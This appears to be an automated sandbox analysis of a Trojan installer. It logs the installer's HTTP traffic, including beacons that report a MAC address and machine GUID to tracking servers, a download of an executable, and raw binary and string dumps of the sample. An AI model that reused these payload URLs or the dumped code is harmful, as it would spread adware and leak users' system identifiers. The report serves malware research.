Date: Sun, 13 Dec 2015 00:52:43 GMT

Server: Microsoft-IIS/8.0

X-AspNet-Version: 4.0.30319

X-AspNetMvc-Version: 4.0

X-Powered-By: ASP.NET

Content-Length: 8

Connection: keep-alive

..OK..HTTP/1.1 200 OK..Cache-Control: private..Content-Type: text/html; charset=utf-8..Date: Sun, 13 Dec 2015 00:52:43 GMT..Server: Microsoft-IIS/8.0..X-AspNet-Version: 4.0.30319..X-AspNetMvc-Version: 4.0..X-Powered-By: ASP.NET..Content-Length: 8..Connection: keep-alive....OK......

GET /Installer/Flow?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:50:56:3B:0E:71&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=212.178.30.28&downloadtime=11/20/2015 2:38:00 PM&clickid=&version=6.12&nipids=-29408-28693-12929-28657-29219-29736&secondcall=1&reqid=379394606 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19

Host: srv.DESK-TOP-APP.INFO

Connection: Keep-Alive

HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html; charset=utf-8

Date: Sun, 13 Dec 2015 00:52:45 GMT

Server: Microsoft-IIS/8.0

X-AspNet-Version: 4.0.30319

X-AspNetMvc-Version: 4.0

X-Powered-By: ASP.NET

Content-Length: 19375

Connection: keep-alive

..Sv.NlmsAxc.2..*.JqaEv`.5. ).Bkmnjf`grQsoa"83$.Fmkcsez_oajgRvjdo"8.(( .*,3)25(*,&02. .RcbC`r 7.!("P`_F^w3.!6" '.M^nllsJak`.5.?SI!("Nmg_naqCC.:/'.<eu^srKfd`j.3.).HoW_dlAhpFhrpajg.5**.?waUPG.5. ).DteSMD-.8.. .Cmhe\gbIcma"8..'.Mc`dnUPG.5.fqno6/-njq'QBLUARB<L<LPS(bkm-*ga_com.@yl\ed\Mc`dnSam]`g=l`earg_5/,/#jh`s;-1/)6*,7291()-206'14632%-20.3%`iqoa_61--24&j`Y_i;/3425$^gpgrosh`=01*!lwp\hp=1-.^hmhcdlrm_m^ml^gd9Un_Yo^q#^e^=.!`]63#cr]ge8)!ocomhkn;1&, $brsarl\d8) ).Q]tc.2(**.;c`irdgiZjA[s]"8.*4-.5'1467.%, 7/3,.840/( 7/ 8., <fobtfltoeqM]bDcvm!6" '.KZwlos.: ,$.>dc_bpit`.5&/).OnokjldhlO[sa"8()'.Bfmbnen\f^rP^nd.: ,$.Ljb_o=fr`jDgqq[kh"8 $.Ogont]lMa^`kAlgl]nbGai^ 7.!("A\fMnl>mBdeafZjq 7nqqe*.JpgGk;fcrcnkdocFhrpajg]m.8.. .RsiAiKcdok]rGikoZji_q.: .$.Ipb?waRcnmgmRbll.: .$.Ipb?waRcnmgmT^fta"8..'.NlmsAxcM]nnjqNdnm 5..% MirpEv`J`lsinU]ls`.5. ).OksrM]bDcv-1.: .$.ImpnQagI`q1- 7.!y,y.HjlrBrd.: .$.Ipb?wa"8..'.AlgokncilOrnb.9-, Hgibrft`pimiLticp.9.0 '.M^eH_x.: CC@R]@OQNELOWPLCO.RkfrrYm^ZY;legm.hqu.y.GGEWZ;PKPBHS[UQ@J.Lmcnv]rcWTHZgi(Qq\Z<ed`mFhrpajg]m.pcl!("P`_F^w3.!6"FF=TXARLQANRZMN>P.Mnbtu\j`UZ>ghco.knw.z.BJAY]>MMKCKN^QSCM.Nhdqq`neZWE\bj LtX\?habhGkms]lj`j.kdo. .RckgmmL^gd.: <ed`m?lnsscm.'.NoicqcrD<.306./4, <drZwpIebep.2 % FmV]irAgmBlpn`hl 5)'.Cu_TNL 5.cmrm4. akd_j[gk(b`nk\ag'pr)@iiej<dlroca*ev`.'.Cu_TNL0.2.arqj9 /_habh`fh-_dlhYde,oo.=mgbg?bqqlh^.c

<<< skipped >>>

GET /Installer/XP/XPLimitChecker.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: d2vubraihqcany.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 50053

Connection: keep-alive

Date: Thu, 10 Dec 2015 04:01:33 GMT

Last-Modified: Mon, 04 May 2015 10:45:00 GMT

ETag: "b6631cd12092841cac0763c854828c50"

Accept-Ranges: bytes

Server: AmazonS3

Age: 68488

X-Cache: Hit from cloudfront

Via: 1.1 297739e3d74d139e546f90d2ef5a6887.cloudfront.net (CloudFront)

X-Amz-Cf-Id: sE99QuckcO4Q42fRgkRY8QxMtKVKoXn2caPc6WvTsjP1UygiKRcnEA==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^....... ...0.......p....@..........................0...............................................t..........(C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X............v..............@....ndata....... ...........................rsrc...(C.......D...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.E..H.P.u..u..u...Hr@..B...SV.5p.E..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.D.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....E...Si.. ..VW.T.....tO.q.3.;5..E.sB..i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5..E.r._^[...U..QQ.U.SV..i.. .

<<< skipped >>>

GET /Installer/Track?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&reqid=379394606&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:50:56:3B:0E:71&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=212.178.30.28&downloadtime=11/20/2015 2:38:00 PM&clickid=&status=2&installedid=29820&z=1&offerscreenid=655&offerorder=-1&downloadduration=-1&installduration=-1&issecond=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19

Host: srv.DESK-TOP-APP.INFO

Connection: Keep-Alive

HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html; charset=utf-8

Date: Sun, 13 Dec 2015 00:52:44 GMT

Server: Microsoft-IIS/8.0

X-AspNet-Version: 4.0.30319

X-AspNetMvc-Version: 4.0

X-Powered-By: ASP.NET

Content-Length: 8

Connection: keep-alive

..OK..HTTP/1.1 200 OK..Cache-Control: private..Content-Type: text/html; charset=utf-8..Date: Sun, 13 Dec 2015 00:52:44 GMT..Server: Microsoft-IIS/8.0..X-AspNet-Version: 4.0.30319..X-AspNetMvc-Version: 4.0..X-Powered-By: ASP.NET..Content-Length: 8..Connection: keep-alive....OK....

GET /offers/images/Theme12/topLine.jpg HTTP/1.1

Accept: */*

Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: static.revenyou.com

Connection: Keep-Alive

HTTP/1.1 404 Not Found

Date: Sun, 13 Dec 2015 00:52:47 GMT

Content-Type: text/html

Content-Length: 1245

Connection: keep-alive

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">....</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>404 - File or directory not found.</h2>.. <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>.. </fieldset></div>..</div>..</body>..</html>......

<<< skipped >>>

GET /offers/images/Theme12/bodyImg.png HTTP/1.1

Accept: */*

Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: static.revenyou.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sun, 13 Dec 2015 00:52:47 GMT

Content-Type: image/png

Content-Length: 1914

Connection: keep-alive

Cache-Control: max-age=604800

Last-Modified: Mon, 05 Aug 2013 10:27:32 GMT

ETag: "36dd864c691ce1:0"

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

Expires: Sun, 20 Dec 2015 00:52:47 GMT

X-Cache: HIT

Accept-Ranges: bytes

.PNG........IHDR.......:.....j.......sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...0PLTE................................................{.......IDATx......:..`..p..J.4.ty.:......)v..\....,.fwv..U...!.....b.f.....Cy(..OW......w......]R..l..2My}<..]..8hn{*..X.).m..4w.U.J.....u..l.J...<...>uJ.....i.>o.%......I.\..S......U.D.}OK..J`......sJ`.}..M.9%..A....u.T.%........K....OQ..._..d.>..L....]I. U.].c.Je...|.W.U?..E.}...*.vZ...K...M....).W...^V..>).e(.].Z.}dg%@....S.*/...........Y.W.]}...|.SgO........rrj...4UY../..r.~.....Z.ep.wui.sP^..X.g%$(.......C........Ze....4yn}....U.({.V..{o..}O...w.G.Q.^..r..p....0y............8......6.v....zz~....-...F*..f.F]...R..*. -......e{mO.s.i.9.U....zz.6.f.T>.f.DQ%.. ...l.q\N."eA({_W7..Q.....d........>...Y.."e.\....s,.. .Li)%....R.o.....C.9wQ....8........KNY..t..)...k...v)P*.....I...4&../.{)..qe..R.'...2..*..d.z&.T;y..)Q*....)R..2..)Tj.B..)V..b..)W......QB!rj.B.J)..N)b*...R)q..<S...z%.LPr..%.LQ2.4e.....q&*c.De,..J.x& ig...g..b.(.g..p.)Qf..uf*1g..af .Y...... .;(.....s......r.v. ...s'...K.0wS.....sG%.......-.R..}......4S.....W.....=.9eN(..OS..Jt(...<...P.(..DJ;_)..Y. ..7.>.@.Bi....HS)eM.qi;...........$.z%.[..P...SJzT*E]......2zT.t..L%6.TJ..Y.a...}.V..J...,.....H... ....;..2_._/[.^/[.\.W.\.!..%oT*y.Z....#Q.Bw.FI.7...H..2Jt.*..../........2.F..X.....gqJ.q:.U.q.. V...B..s.(.J2.x..()#1@.'d4.Hh.h.J.I.i.G.#.;.J....*Q$Z..?.........sR..D.<...| ......2.1b.A3...v.....X.y{..R....{h..pzJ.I.).Y..Kn.z;%Jn..c.W...bL........t..!...A..(..*

<<< skipped >>>

GET /offers/images/Theme12/bottomLine.jpg HTTP/1.1

Accept: */*

Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: static.revenyou.com

Connection: Keep-Alive

HTTP/1.1 404 Not Found

Date: Sun, 13 Dec 2015 00:52:47 GMT

Content-Type: text/html

Content-Length: 1245

Connection: keep-alive

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">....</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>404 - File or directory not found.</h2>.. <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>.. </fieldset></div>..</div>..</body>..</html>......

<<< skipped >>>

GET /offers/images/Theme12/button_over.png HTTP/1.1

Accept: */*

Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: static.revenyou.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sun, 13 Dec 2015 00:52:47 GMT

Content-Type: image/png

Content-Length: 921

Connection: keep-alive

Cache-Control: max-age=604800

Last-Modified: Mon, 05 Aug 2013 17:21:05 GMT

ETag: "f072da2a092ce1:0"

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

Expires: Sun, 20 Dec 2015 00:52:47 GMT

X-Cache: HIT

Accept-Ranges: bytes

.PNG........IHDR...Y............m....tEXtSoftware.Adobe ImageReadyq.e<...;IDATx..Z;o.1..Y.D...W."$=D..*=BPR@..5..........DHi...M.i...e.r............;..N.h..=.|..x6..f..pf...n...yX...>z......`87.3...t.e:.sh..e..z.A....G.p..IZ.z...?Ra8........Y......O.......[........sL..?@.o....y..-.....Lc.0......O..|z.O/...k.....e...n..!......G.p...9....3. .'?7 ..GD@..{.<....C$....N.........Q...<.,@...].;Q.'<.(.X.r.,.6.......QrB..h..d&r....6....G..Shr.... .....4r..= ..f.....B.qP..l.K........YB.Z....H....../:.l.(.S.D...nM7..P.%R........&_uR.H6A..(raP.H9...[\D. .(....d...`.8.A......r5Q..........:v.e....u.....-&.1.....&.........Z.|....).L...$....)K%a-....b..a*{<(W..P<..w7_Z.....h.%6.N........*\FB...A...#..f.N...C..(.p...........K.|..5d..3u-........(.k. 7..6..tsvP!.U0.q.......9z.e ..0.ALt..@l..2iR.2............. .>=...{WVim....f.c6.:...|.....0X.yk...../z..!.SHW.d......o.s........a..8..g.|zvg...o6......@..........n.^......IEND.B`.....

GET /offers/images/Theme12/button.png HTTP/1.1

Accept: */*

Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: static.revenyou.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sun, 13 Dec 2015 00:52:47 GMT

Content-Type: image/png

Content-Length: 458

Connection: keep-alive

Cache-Control: max-age=604800

Last-Modified: Mon, 05 Aug 2013 17:21:12 GMT

ETag: "1b5642f092ce1:0"

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

Expires: Sun, 20 Dec 2015 00:52:47 GMT

X-Cache: HIT

Accept-Ranges: bytes

.PNG........IHDR...Y............m....tEXtSoftware.Adobe ImageReadyq.e<...lIDATx...1..p....at.`...[_)...&.........~...C..V$z.J.w.Wi........../..<........R.H)s..i....t.....}2M...9i.&..(..c.....l.&.0`.&a..f...p...R.Jr....bA....$.....cr....u....sq..x....?..> ..pu`.h..C.......$w$..gY. .....%9MS...V.....IF'..0].;..HF..]b..Hr..pW...k..{..EQD.....-L.....#..H.u.. ..lF....j".,<........<. ......18....\.....oI...^.....:..._......rU.<Z`..d..E.|.0.......B.....IEND.B`.HTTP/1.1 200 OK..Date: Sun, 13 Dec 2015 00:52:47 GMT..Content-Type: image/png..Content-Length: 458..Connection: keep-alive..Cache-Control: max-age=604800..Last-Modified: Mon, 05 Aug 2013 17:21:12 GMT..ETag: "1b5642f092ce1:0"..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..Expires: Sun, 20 Dec 2015 00:52:47 GMT..X-Cache: HIT..Accept-Ranges: bytes...PNG........IHDR...Y............m....tEXtSoftware.Adobe ImageReadyq.e<...lIDATx...1..p....at.`...[_)...&.........~...C..V$z.J.w.Wi........../..<........R.H)s..i....t.....}2M...9i.&..(..c.....l.&.0`.&a..f...p...R.Jr....bA....$.....cr....u....sq..x....?..> ..pu`.h..C.......$w$..gY. .....%9MS...V.....IF'..0].;..HF..]b..Hr..pW...k..{..EQD.....-L.....#..H.u.. ..lF....j".,<........<. ......18....\.....oI...^.....:..._......rU.<Z`..d..E.|.0.......B.....IEND.B`...

<<< skipped >>>

GET //offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0& HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: srv.serverdatasrv.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html; charset=utf-8

Date: Sun, 13 Dec 2015 00:52:42 GMT

Server: Microsoft-IIS/8.0

X-AspNet-Version: 4.0.30319

X-AspNetMvc-Version: 4.0

X-Powered-By: ASP.NET

Content-Length: 12892

Connection: keep-alive

<html>. <head>. <title>5 - NonProduct (Download Manager)</title><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(['_setAccount', 'UA-37348037-1']);_gaq.push(['_setDomainName', 'ppdownload.com']);_gaq.push(['_setAllowLinker', true]);.. _gaq.push(['_trackPageview']);.. (function() {.. var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;.. ga.src = ('https:' == document.location.protocol ? 'hXXps://' : 'hXXp://') 'stats.g.doubleclick.net/dc.js';.. var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);.. })();</script><style type='text/css'>body { width:100%; height:100%; margin:0px; padding:0px; font-size:font-family:helvetica; font-size:12px;} .divLeadpName { border-bottom-style:groove;border-bottom-width: thin; padding-left:61px; padding-top:9px; font-size:font-family:helvetica; font-style:italic; font-size:25px; font-weight:bold; color:black; position:absolute; width: 100%; background-color: #fff; ba} #divTop {display: none} #divMiddle {background-color: #efecec; height: 100%;} #middle {background-color: #fff;} .divOnNext { position:absolute;

<<< skipped >>>

GET /offers/images/Theme12/topComp.png HTTP/1.1

Accept: */*

Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: static.revenyou.com

Connection: Keep-Alive

HTTP/1.1 404 Not Found

Date: Sun, 13 Dec 2015 00:52:47 GMT

Content-Type: text/html

Content-Length: 1245

Connection: keep-alive

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">....</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>404 - File or directory not found.</h2>.. <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>.. </fieldset></div>..</div>..</body>..</html>......

<<< skipped >>>

GET /offers/images/Theme12/bgImg.jpg HTTP/1.1

Accept: */*

Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: static.revenyou.com

Connection: Keep-Alive

HTTP/1.1 404 Not Found

Date: Sun, 13 Dec 2015 00:52:47 GMT

Content-Type: text/html

Content-Length: 1245

Connection: keep-alive

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">....</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>404 - File or directory not found.</h2>.. <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>.. </fieldset></div>..</div>..</body>..</html>......

<<< skipped >>>

GET /offers/images/Theme12/nextCase.jpg HTTP/1.1

Accept: */*

Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: static.revenyou.com

Connection: Keep-Alive

HTTP/1.1 404 Not Found

Date: Sun, 13 Dec 2015 00:52:47 GMT

Content-Type: text/html

Content-Length: 1245

Connection: keep-alive

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">....</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>404 - File or directory not found.</h2>.. <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>.. </fieldset></div>..</div>..</body>..</html>..HTTP/1.1 404 Not Found..Date: Sun, 13 Dec 2015 00:52:47 GMT..Content-Type: text/html..Content-Length: 1245..Connection: keep-aliv

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_204:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

... %d%%

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|/":

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\beeiachifd.exe 7*6*7*6*6*7*5*2*0*1*0 KEpCPjcqMTIzMyAoTU48SkI/OzAfL0c/TVFJS0ZHRDwxGSk9Q01NREI9MjAsLTEaKTxEQj0vIChKS0k Tj5SX0hENiwyLzAuGy1TRFJPP0tZT0tHO2hzdGk0KClta3EsRERTRCdNSUomPE5QLUlHQEgaKTxHR0NKST03GSk KjgrMR8vPSw2JysZKkIzPC0qGig LjYoLyAuRC43JisaKEtQT0NVPE5YSkxCUT9DWD0ZKUlMST1QQVReRU5GOjcaKEtQT0NVPE5YSDtGQDtVb2Rabl5tGihAVkVeVUtGNmJubWs4Ly5kaHFnZmlaXytzZHJvX2ttKFxqay9SeWxDZ2BpKFFNU3N1Wyhecl8ZKkNYRF88Rz1GQ0dAOyAuSEhNTVk8S0pVU0RSNi8ZKU5BPExLWE9OWU5MRjYbLVZMPSsaKD5NKjgeL1FVR05CRz9YUkNMQk9GP0JHO0BAU1JLPRkpQk1ZS1BMVEhNPjdtbG9eGy1SRFROTEdDSEBaU1NEUlg OlNNNi0eL0dJPT9RNysZKkdTXkRSSDpHQzxaQ05CUlJKTT8 NmFfbHJlGSk9SVFHR01BQ19CSjYsKyspLzc3LiwqJywyGSpOQVFBRUY RllCSVFUQExFN21sb14bLVRITT43Ki4uMSsxMDE4KRooPklQSUpPQERYTkJHPzYsLy8xMCgsKSsvIy04Mzc6KSojSkc=

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp

beeiachifd.exe

8 8$8(8,80848

Certification Services Division1806

hXXp://t2.symcb.com0

!hXXp://t1.symcb.com/ThawtePCA.crl0

hXXp://tl.symcb.com/tl.crl0

hXXps://VVV.thawte.com/cps0/

!hXXps://VVV.thawte.com/repository0

hXXp://tl.symcd.com0&

hXXp://tl.symcb.com/tl.crt0

.?AV?$CAtlExeModuleT@VCSmartInstallerModule@@@ATL@@

.?AVCWebPage@@

:,:0:4:8:

9Å“9P9g9

9#9'9-91999

9"9/999_9

="=&=*=.=

Q.twz

.rwe:r

?%xh |4

WinHttpCrackUrl

WinHttpOpen

WinHttpCloseHandle

WinHttpConnect

WinHttpReadData

WinHttpWriteData

WinHttpQueryDataAvailable

WinHttpSetOption

WinHttpSetTimeouts

WinHttpOpenRequest

WinHttpAddRequestHeaders

WinHttpSendRequest

WinHttpReceiveResponse

WinHttpQueryHeaders

WinHttpGetProxyForUrl

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

PSAPI.DLL

GetProcessHeap

uQ.yZ

c:\%original file name%.exe

%original file name%.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb1.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

Nullsoft Install System v2.46

{8856F961-340A-11D0-A96B-00C04FD705A2}

00000000

6392.151120.1377.7500

beeiachifd.exe_364:

.text

`.rdata

@.data

.rsrc

@.reloc

tCPjB

r%f;M

j.Yf;

_tcPVj@

.PjRW

%d/%d/%d %d:%d:%d

Summary

Dynamic Analysis

Removals

Static Analysis

Network Activity

Map

Strings from Dumps